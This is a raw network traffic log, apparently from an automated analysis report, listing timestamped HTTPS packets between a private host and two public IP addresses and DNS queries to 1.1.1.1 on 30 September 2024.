                                                                                                                                                                      Sep 30, 2024 18:19:14.740745068 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:14.740765095 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:14.740811110 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:14.741000891 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:14.741054058 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:14.741080046 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:14.741095066 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:14.741102934 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:14.741142035 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:14.742042065 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:14.745589972 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:14.745636940 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:14.745647907 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:14.790182114 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:14.828658104 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:14.828952074 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:14.828994036 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:14.829015017 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:14.829062939 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:14.829094887 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:14.829099894 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:14.829111099 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:14.829144001 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:14.829149961 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:14.829797029 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:14.829821110 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:14.829842091 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:14.829849005 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:14.829883099 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:14.829889059 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:14.830580950 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:14.830619097 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:14.830626011 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:14.830634117 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:14.830666065 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:14.830672979 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:14.830701113 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:14.830739021 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:14.830745935 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:14.831530094 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:14.831573009 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:14.831581116 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:14.831691980 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:14.831721067 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:14.831728935 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:14.831734896 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:14.831777096 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:14.917749882 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:14.917814016 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:14.917840004 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:14.917855024 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:14.917865038 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:14.917879105 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:14.917900085 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:14.917926073 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:14.917956114 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:14.917965889 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:14.917995930 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:14.918028116 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:14.918036938 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:14.918108940 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:14.918158054 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:14.918196917 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:14.918201923 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:14.918241978 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:14.918766975 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:14.918797970 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:14.918811083 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:14.918817043 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:14.918838024 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:14.918855906 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:14.919953108 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:14.919996977 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:14.920010090 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:14.920047045 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:14.920052052 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:14.920066118 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:14.920094013 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:14.920480967 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:14.920525074 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:14.920533895 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:14.920572996 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:14.920695066 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:14.920739889 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:14.920747995 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:14.920784950 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:14.920789003 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:14.920829058 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:14.921555996 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:14.921582937 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:14.921610117 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:14.921617031 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:14.921638012 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:14.921652079 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:15.005758047 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:15.005796909 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:15.005820990 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:15.005837917 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:15.005861998 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:15.005881071 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:15.006171942 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:15.006221056 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:15.006333113 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:15.006375074 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:15.006494045 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:15.006536007 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:15.006592035 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:15.006628990 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:15.007039070 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:15.007102966 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:15.007622004 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:15.007657051 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:15.007666111 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:15.007672071 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:15.007692099 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:15.008069992 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:15.008101940 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:15.008115053 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:15.008121014 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:15.008142948 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:15.008152962 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:15.008169889 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:15.008189917 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:15.008196115 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:15.008215904 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:15.008316994 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:15.008351088 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:15.008358955 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:15.008363962 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:15.008387089 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:15.008879900 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:15.008924007 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:15.008932114 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:15.008963108 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:15.009013891 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:15.009052038 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:15.009054899 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:15.009066105 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:15.009089947 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:15.009109020 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:15.009295940 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:15.009329081 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:15.009341955 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:15.009347916 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:15.009368896 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:15.009382010 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:15.009885073 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:15.009932995 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:15.009963036 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:15.010000944 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:15.010122061 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:15.010154963 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:15.010164022 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:15.010169983 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:15.010189056 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:15.010205984 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:15.010821104 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:15.010870934 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:15.102838993 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:15.102915049 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:15.102988958 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:15.103033066 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:15.103116989 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:15.103174925 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:15.103176117 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:15.103204012 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:15.103230000 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:15.103708029 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:15.103754044 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:15.103765965 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:15.103790045 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:15.103822947 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:15.104154110 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:15.104197979 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:15.104213953 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:15.104228020 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:15.104250908 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:15.104573965 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:15.104617119 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:15.104629040 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:15.104650021 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:15.104676962 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:15.104832888 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:15.104876995 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:15.104892969 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:15.104906082 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:15.104926109 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:15.108059883 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:15.108100891 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:15.108118057 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:15.108129025 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:15.108150005 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:15.108630896 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:15.108669043 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:15.108684063 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:15.108711958 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:15.108728886 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:15.108793020 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:15.149490118 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:15.191354990 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:15.191447020 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:15.191487074 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:15.191543102 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:15.191668034 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:15.191728115 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:15.191740036 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:15.191765070 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:15.191783905 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:15.191803932 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:15.191924095 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:15.191978931 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:15.191982985 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:15.191994905 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:15.192078114 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:15.192145109 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:15.192189932 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:15.236408949 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:15.236437082 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:16.904220104 CEST49710443192.168.2.8104.102.49.254
                                                                                                                                                                      Sep 30, 2024 18:19:16.904289961 CEST44349710104.102.49.254192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:16.904386997 CEST49710443192.168.2.8104.102.49.254
                                                                                                                                                                      Sep 30, 2024 18:19:16.909171104 CEST49710443192.168.2.8104.102.49.254
                                                                                                                                                                      Sep 30, 2024 18:19:16.909192085 CEST44349710104.102.49.254192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:17.609016895 CEST44349710104.102.49.254192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:17.609095097 CEST49710443192.168.2.8104.102.49.254
                                                                                                                                                                      Sep 30, 2024 18:19:17.612406969 CEST49710443192.168.2.8104.102.49.254
                                                                                                                                                                      Sep 30, 2024 18:19:17.612418890 CEST44349710104.102.49.254192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:17.612760067 CEST44349710104.102.49.254192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:17.665121078 CEST49710443192.168.2.8104.102.49.254
                                                                                                                                                                      Sep 30, 2024 18:19:17.749109983 CEST49710443192.168.2.8104.102.49.254
                                                                                                                                                                      Sep 30, 2024 18:19:17.795397997 CEST44349710104.102.49.254192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:18.148951054 CEST44349710104.102.49.254192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:18.149022102 CEST44349710104.102.49.254192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:18.149040937 CEST44349710104.102.49.254192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:18.149065971 CEST49710443192.168.2.8104.102.49.254
                                                                                                                                                                      Sep 30, 2024 18:19:18.149081945 CEST44349710104.102.49.254192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:18.149101019 CEST44349710104.102.49.254192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:18.149116993 CEST49710443192.168.2.8104.102.49.254
                                                                                                                                                                      Sep 30, 2024 18:19:18.149126053 CEST44349710104.102.49.254192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:18.149136066 CEST49710443192.168.2.8104.102.49.254
                                                                                                                                                                      Sep 30, 2024 18:19:18.149151087 CEST49710443192.168.2.8104.102.49.254
                                                                                                                                                                      Sep 30, 2024 18:19:18.149168968 CEST49710443192.168.2.8104.102.49.254
                                                                                                                                                                      Sep 30, 2024 18:19:18.237477064 CEST44349710104.102.49.254192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:18.237545967 CEST44349710104.102.49.254192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:18.237607956 CEST49710443192.168.2.8104.102.49.254
                                                                                                                                                                      Sep 30, 2024 18:19:18.237624884 CEST44349710104.102.49.254192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:18.237660885 CEST49710443192.168.2.8104.102.49.254
                                                                                                                                                                      Sep 30, 2024 18:19:18.237730980 CEST44349710104.102.49.254192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:18.239511013 CEST49710443192.168.2.8104.102.49.254
                                                                                                                                                                      Sep 30, 2024 18:19:18.239541054 CEST44349710104.102.49.254192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:18.239556074 CEST49710443192.168.2.8104.102.49.254
                                                                                                                                                                      Sep 30, 2024 18:19:18.239556074 CEST49710443192.168.2.8104.102.49.254
                                                                                                                                                                      Sep 30, 2024 18:19:18.239564896 CEST44349710104.102.49.254192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:18.239572048 CEST44349710104.102.49.254192.168.2.8
                                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                      Sep 30, 2024 18:19:11.220010996 CEST5149553192.168.2.81.1.1.1
                                                                                                                                                                      Sep 30, 2024 18:19:11.233417034 CEST53514951.1.1.1192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:16.762079954 CEST5502953192.168.2.81.1.1.1
                                                                                                                                                                      Sep 30, 2024 18:19:16.774982929 CEST53550291.1.1.1192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:16.780191898 CEST5854053192.168.2.81.1.1.1
                                                                                                                                                                      Sep 30, 2024 18:19:16.790380955 CEST53585401.1.1.1192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:16.793556929 CEST5546153192.168.2.81.1.1.1
                                                                                                                                                                      Sep 30, 2024 18:19:16.805269003 CEST53554611.1.1.1192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:16.808005095 CEST5356353192.168.2.81.1.1.1
                                                                                                                                                                      Sep 30, 2024 18:19:16.817322969 CEST53535631.1.1.1192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:16.819789886 CEST5074153192.168.2.81.1.1.1
                                                                                                                                                                      Sep 30, 2024 18:19:16.830327988 CEST53507411.1.1.1192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:16.832659960 CEST6132953192.168.2.81.1.1.1
                                                                                                                                                                      Sep 30, 2024 18:19:16.842688084 CEST53613291.1.1.1192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:16.845072985 CEST5575853192.168.2.81.1.1.1
                                                                                                                                                                      Sep 30, 2024 18:19:16.855815887 CEST53557581.1.1.1192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:16.858484983 CEST5067053192.168.2.81.1.1.1
                                                                                                                                                                      Sep 30, 2024 18:19:16.868278980 CEST53506701.1.1.1192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:16.869632959 CEST5916153192.168.2.81.1.1.1
                                                                                                                                                                      Sep 30, 2024 18:19:16.887676001 CEST53591611.1.1.1192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:16.890495062 CEST5964653192.168.2.81.1.1.1
                                                                                                                                                                      Sep 30, 2024 18:19:16.897443056 CEST53596461.1.1.1192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:44.883356094 CEST6489753192.168.2.81.1.1.1
                                                                                                                                                                      Sep 30, 2024 18:19:44.892527103 CEST53648971.1.1.1192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:58.251636028 CEST5109653192.168.2.81.1.1.1
                                                                                                                                                                      Sep 30, 2024 18:19:58.468884945 CEST53510961.1.1.1192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:20:06.543725967 CEST5996753192.168.2.81.1.1.1
                                                                                                                                                                      Sep 30, 2024 18:20:06.637161016 CEST53599671.1.1.1192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:20:14.626483917 CEST5587553192.168.2.81.1.1.1
                                                                                                                                                                      Sep 30, 2024 18:20:14.715432882 CEST53558751.1.1.1192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:20:32.463187933 CEST5992153192.168.2.81.1.1.1
                                                                                                                                                                      Sep 30, 2024 18:20:32.673240900 CEST53599211.1.1.1192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:20:40.999475002 CEST5884753192.168.2.81.1.1.1
                                                                                                                                                                      Sep 30, 2024 18:20:41.330818892 CEST53588471.1.1.1192.168.2.8
